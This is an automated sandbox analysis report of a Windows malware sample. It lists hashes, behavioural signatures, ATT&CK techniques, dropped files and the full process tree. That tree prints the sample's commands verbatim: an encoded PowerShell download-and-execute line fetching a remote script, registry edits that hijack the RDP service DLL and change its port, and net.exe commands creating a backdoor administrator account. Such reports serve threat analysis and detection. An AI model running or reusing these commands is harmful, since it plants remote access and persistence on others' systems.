Overview

overview

10

Static

static

09fd827d8b...12.exe

windows7_x64

10

09fd827d8b...12.exe

windows10_x64

10

Analysis

  • max time kernel
    143s
  • max time network
    143s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    17-11-2020 12:38

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    09fd827d8b404557a5c9e06810247c12.exe

  • Size

    3.4MB

  • MD5

    afb57d5d065aaa204e8a5c6803bab72b

  • SHA1

    5cd785582bba69f740a8943c02123e683a541b3b

  • SHA256

    3126cbdac814b04d544ff02e968d2143b231bb6d981ff8bf1812f6314cca187e

  • SHA512

    40bfdc844abc2f49e810ac63e6e6b739aa656830d3833292dd1b43456a8452aa7181d675e28e4f4bf0f920009e35b0d631ec39a25968f12b7335528c41181f98

Score
10/10
persistenceupx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Blacklisted process makes network request 9 IoCs
  • Modifies RDP port number used by Windows 1 TTPs
  • Sets DLL path for service in the registry 2 TTPs
    persistence
  • UPX packed file 2 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Deletes itself 1 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies service 2 TTPs 2 IoCs
    persistence
  • Drops file in Program Files directory 4 IoCs
  • Drops file in Windows directory 19 IoCs
  • Modifies data under HKEY_USERS 217 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Script User-Agent 2 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 9 IoCs
  • Suspicious behavior: LoadsDriver 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 77 IoCs
  • Suspicious use of WriteProcessMemory 68 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe
    "C:\Users\Admin\AppData\Local\Temp\09fd827d8b404557a5c9e06810247c12.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1628
    • \??\c:\windows\System32\WindowsPowerShell\v1.0\powershell.exe
      -ep bypass -f C:\Users\Admin\AppData\Local\Temp\get-points.ps1
      2⤵
      • Deletes itself
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4044
      • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.cmdline"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
          C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES95FC.tmp" "c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\CSCDA13A91742D475390F7D6E7FB1B50AF.TMP"
          4⤵
            PID:2792
        • C:\Windows\system32\reg.exe
          "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
          3⤵
            PID:3788
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
            3⤵
            • Modifies service
            • Modifies registry key
            PID:3808
          • C:\Windows\system32\reg.exe
            "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
            3⤵
              PID:3496
            • C:\Windows\system32\net.exe
              "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
              3⤵
              • Suspicious use of WriteProcessMemory
              PID:492
              • C:\Windows\system32\net1.exe
                C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
                4⤵
                  PID:4040
              • C:\Windows\system32\cmd.exe
                "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
                3⤵
                • Suspicious use of WriteProcessMemory
                PID:2184
                • C:\Windows\system32\cmd.exe
                  cmd /c net start rdpdr
                  4⤵
                  • Suspicious use of WriteProcessMemory
                  PID:3876
                  • C:\Windows\system32\net.exe
                    net start rdpdr
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3904
                    • C:\Windows\system32\net1.exe
                      C:\Windows\system32\net1 start rdpdr
                      6⤵
                        PID:3868
                • C:\Windows\system32\cmd.exe
                  "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
                  3⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2852
                  • C:\Windows\system32\cmd.exe
                    cmd /c net start TermService
                    4⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2888
                    • C:\Windows\system32\net.exe
                      net start TermService
                      5⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1532
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 start TermService
                        6⤵
                          PID:2208
                  • C:\Windows\system32\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
                    3⤵
                      PID:360
                    • C:\Windows\system32\cmd.exe
                      "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
                      3⤵
                        PID:3888
                  • C:\Windows\System32\cmd.exe
                    cmd /C net.exe user updwin Ghasar4f5 /del
                    1⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3612
                    • C:\Windows\system32\net.exe
                      net.exe user updwin Ghasar4f5 /del
                      2⤵
                      • Suspicious use of WriteProcessMemory
                      PID:420
                      • C:\Windows\system32\net1.exe
                        C:\Windows\system32\net1 user updwin Ghasar4f5 /del
                        3⤵
                          PID:3996
                    • C:\Windows\System32\cmd.exe
                      cmd /C net.exe user updwin k1x2hnfU /add
                      1⤵
                      • Suspicious use of WriteProcessMemory
                      PID:208
                      • C:\Windows\system32\net.exe
                        net.exe user updwin k1x2hnfU /add
                        2⤵
                        • Suspicious use of WriteProcessMemory
                        PID:396
                        • C:\Windows\system32\net1.exe
                          C:\Windows\system32\net1 user updwin k1x2hnfU /add
                          3⤵
                            PID:1236
                      • C:\Windows\System32\cmd.exe
                        cmd /C net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                        1⤵
                        • Suspicious use of WriteProcessMemory
                        PID:2096
                        • C:\Windows\system32\net.exe
                          net.exe LOCALGROUP "Remote Desktop Users" updwin /ADD
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:3804
                          • C:\Windows\system32\net1.exe
                            C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" updwin /ADD
                            3⤵
                              PID:3436
                        • C:\Windows\System32\cmd.exe
                          cmd /C net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
                          1⤵
                          • Suspicious use of WriteProcessMemory
                          PID:1840
                          • C:\Windows\system32\net.exe
                            net.exe LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
                            2⤵
                            • Suspicious use of WriteProcessMemory
                            PID:1356
                            • C:\Windows\system32\net1.exe
                              C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" MKLUFVRL$ /ADD
                              3⤵
                                PID:2716
                          • C:\Windows\System32\cmd.exe
                            cmd /C net.exe LOCALGROUP "Administrators" updwin /ADD
                            1⤵
                            • Suspicious use of WriteProcessMemory
                            PID:3884
                            • C:\Windows\system32\net.exe
                              net.exe LOCALGROUP "Administrators" updwin /ADD
                              2⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2080
                              • C:\Windows\system32\net1.exe
                                C:\Windows\system32\net1 LOCALGROUP "Administrators" updwin /ADD
                                3⤵
                                  PID:2244
                            • C:\Windows\System32\cmd.exe
                              cmd /C net.exe user updwin k1x2hnfU
                              1⤵
                              • Suspicious use of WriteProcessMemory
                              PID:3548
                              • C:\Windows\system32\net.exe
                                net.exe user updwin k1x2hnfU
                                2⤵
                                • Suspicious use of WriteProcessMemory
                                PID:420
                                • C:\Windows\system32\net1.exe
                                  C:\Windows\system32\net1 user updwin k1x2hnfU
                                  3⤵
                                    PID:1036
                              • C:\Windows\System32\cmd.exe
                                cmd.exe /C wmic path win32_VideoController get name
                                1⤵
                                • Suspicious use of WriteProcessMemory
                                PID:632
                                • C:\Windows\System32\Wbem\WMIC.exe
                                  wmic path win32_VideoController get name
                                  2⤵
                                    PID:208
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C wmic CPU get NAME
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:3788
                                  • C:\Windows\System32\Wbem\WMIC.exe
                                    wmic CPU get NAME
                                    2⤵
                                    • Modifies data under HKEY_USERS
                                    PID:3812
                                • C:\Windows\System32\cmd.exe
                                  cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                  1⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:2284
                                  • C:\Windows\system32\cmd.exe
                                    cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                    2⤵
                                    • Suspicious use of WriteProcessMemory
                                    PID:1840
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
                                      3⤵
                                      • Blacklisted process makes network request
                                      • Drops file in Program Files directory
                                      • Drops file in Windows directory
                                      • Modifies data under HKEY_USERS
                                      • Suspicious behavior: EnumeratesProcesses
                                      PID:1352

                                Network

                                MITRE ATT&CK Matrix ATT&CK v6

                                Initial Access

                                Execution

                                Persistence

                                Account Manipulation

                                1
                                T1098

                                Registry Run Keys / Startup Folder

                                1
                                T1060

                                Modify Existing Service

                                1
                                T1031

                                Privilege Escalation

                                Defense Evasion

                                Modify Registry

                                3
                                T1112

                                Credential Access

                                Discovery

                                Lateral Movement

                                Remote Desktop Protocol

                                1
                                T1076

                                Collection

                                Exfiltration

                                Command and Control

                                Impact

                                Replay Monitor

                                Loading Replay Monitor...

                                Downloads

                                • C:\Users\Admin\AppData\Local\Temp\RES95FC.tmp
                                  MD5

                                  7b4bae7b1a4fb86d479d7a7d45abab57

                                  SHA1

                                  f00a9a82bca413cb94875784900293337872d83c

                                  SHA256

                                  bfa85151bda4784c29cc7c0c892f3ca785c80d7a434c4a1b9cfe617a0a326202

                                  SHA512

                                  ad7b4d65944bfa4311eb2655743ceb45f7ad4aa33e543835d15aaebeaee57a1ca2e098ba40914528cf81941edae0cbe8494288bcb21fd2c2ae98b04a77b220bb

                                  Download Submit
                                • C:\Users\Admin\AppData\Local\Temp\get-points.ps1
                                  MD5

                                  dac6b25db50155c0c78d5bf64fb95fa3

                                  SHA1

                                  9e49c8f7a6df94acdefd0daa4c330f92f6d01d0d

                                  SHA256

                                  6967c2ea21792d390309dfd66d56b19f89d89ba4a6fb8f39f10a8212d5e70eaf

                                  SHA512

                                  679b3706f2c03898afb4250b1f51d5e0e7187ed923f7d7cc3a06c5f9a1e5b18bbbc46e9c2c9abd0b4b42e5e3a5b2dd668e3057063562b874119c42e855292868

                                  Download Submit
                                • C:\Users\Admin\AppData\Local\Temp\get-points.zip
                                  MD5

                                  7cac19b2868c41555db4b71219217f9b

                                  SHA1

                                  d6f77db578db3c5c572c3a944d9072ed00560dcb

                                  SHA256

                                  d8f648e2952466c25343b095ed14591b25b29d0d1c391ca019a8d8f0a39b934a

                                  SHA512

                                  5bafea5eed1ba0493188bb79eafda47a141281fb3258be0dfe08b6b78e5dcf731fd2142b94f95b3203fa6daad27fff1f4495ac7bdebe6eb8a9cbe31b16bfc7b6

                                  Download Submit
                                • C:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.dll
                                  MD5

                                  8290e396ce6498b0ecc75c7629284dc5

                                  SHA1

                                  50d4c1a43e8f75a0f82a532c7e42c2bc326f8a85

                                  SHA256

                                  3c5caa83e8f51702acbf1d77ce453d28172229935b9b782d5ca4ee21d87b547a

                                  SHA512

                                  8782392ae4a3d28180a7748ca9eea2acb0bc955c923090b30e48b6210a189abc72adb61a39a2a282deeb844030bebb553d6dc1607492d68da87f2875569d5118

                                  Download Submit
                                • \??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\CSCDA13A91742D475390F7D6E7FB1B50AF.TMP
                                  MD5

                                  5c3155b03edf4a4e2dc7793d3c91083a

                                  SHA1

                                  99b2b850c3eabe267fa2c62818a4dd50bc5049d3

                                  SHA256

                                  7c87e9fab418ea94ad13df701b6035cddba5cb22517502430d1f86ad2866a192

                                  SHA512

                                  a04950d75c41ba60dcac8ea8d8623eb347007af93ae2212a82dffec8bf1cd6d1bc15d46d1c25ce965a3fa815dc8c50ae741bf3a7ee0687e020cfdc99eea917f0

                                  Download Submit
                                • \??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.0.cs
                                  MD5

                                  6f235215132cdebacd0f793fe970d0e3

                                  SHA1

                                  2841e44c387ed3b6f293611992f1508fe9b55b89

                                  SHA256

                                  ccad602538354ee5bbc78ab935207c36ba9910da1a7b5a10ff455e34e15f15ec

                                  SHA512

                                  a14657bc5be862a96c1826347b551e07b47ffa6ffd7e12fbfc3437b9a48e8b8e020ae71b8ef836c357d9db6c065da962a6141272d9bc58b76a9eb9c11553d44e

                                  Download Submit
                                • \??\c:\Users\Admin\AppData\Local\Temp\xlpsxo0v\xlpsxo0v.cmdline
                                  MD5

                                  05cff55c341e110ebe530869da489356

                                  SHA1

                                  7c8fee5a4a3c679bf9128a7c40a2432527d86dbd

                                  SHA256

                                  3049b210871c80f0f7ba283ff092633c4599ee06ab7d5e787cec1a54b68a32a8

                                  SHA512

                                  70f0136882a3026d3086842d709ee71c4d34981f79b48f73b751ea4749b02f1ce94cdff803d3156313e3ccd413e2f2ad3645ba2fe1415cfb2b3a8f1bf66136ef

                                  Download Submit
                                • \Windows\Branding\mediasrv.png
                                  MD5

                                  eeb448ea2709c57b9ea2e223d0c79396

                                  SHA1

                                  38331dd027386151ee37a29a7820570a76427b02

                                  SHA256

                                  c82a8ca8997348bc1631637799d8c88e33df3b64d23fdb006a1afdb5e0170272

                                  SHA512

                                  c133096ce90e5693669c056a31870b982b162196508babae4d1d9eb4055f2096af9460164d68885693af56389a42977f4193906da1d19f457e26187a46a5e3fc

                                  Download Submit
                                • \Windows\Branding\mediasvc.png
                                  MD5

                                  bb873bd05a47f502ee4ed3c4ea749a4f

                                  SHA1

                                  e55a6bf49a4833fb9e9b123df39dac9bf507f75a

                                  SHA256

                                  a6a28143f81b007c6853cc80829c16d2aadbe427abe1408276b558f34904900a

                                  SHA512

                                  ce2a22e5e78d3f01a6880a48153f6d3ba8ff025d7bbfe8949b7742a5b7ffa9e44484027353bb80b70e8cad8181dc26b6aabe637b5f7fd2aa4a99cd880d758548

                                  Download Submit
                                • memory/208-42-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/360-50-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/396-32-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/420-40-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/420-30-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/492-18-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1036-41-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1236-33-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1352-45-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1352-46-0x00007FF81F780000-0x00007FF82016C000-memory.dmp
                                  Filesize

                                  9.9MB

                                  Download
                                • memory/1356-36-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1532-26-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1628-1-0x0000000001810000-0x0000000001811000-memory.dmp
                                  Filesize

                                  4KB

                                  Download
                                • memory/1840-44-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/1892-7-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2080-38-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2184-20-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2208-27-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2244-39-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2716-37-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2792-10-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2852-24-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/2888-25-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3436-35-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3496-17-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3788-15-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3804-34-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3808-16-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3812-43-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3868-23-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3876-21-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3888-51-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3904-22-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/3996-31-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/4040-19-0x0000000000000000-mapping.dmp
                                  Download
                                • memory/4044-14-0x00000234984A0000-0x00000234984A1000-memory.dmp
                                  Filesize

                                  4KB

                                  Download
                                • memory/4044-5-0x000002349AEA0000-0x000002349AEA1000-memory.dmp
                                  Filesize

                                  4KB

                                  Download
                                • memory/4044-4-0x0000023498440000-0x0000023498441000-memory.dmp
                                  Filesize

                                  4KB

                                  Download
                                • memory/4044-3-0x00007FF81F780000-0x00007FF82016C000-memory.dmp
                                  Filesize

                                  9.9MB

                                  Download
                                • memory/4044-2-0x0000000000000000-mapping.dmp
                                  Download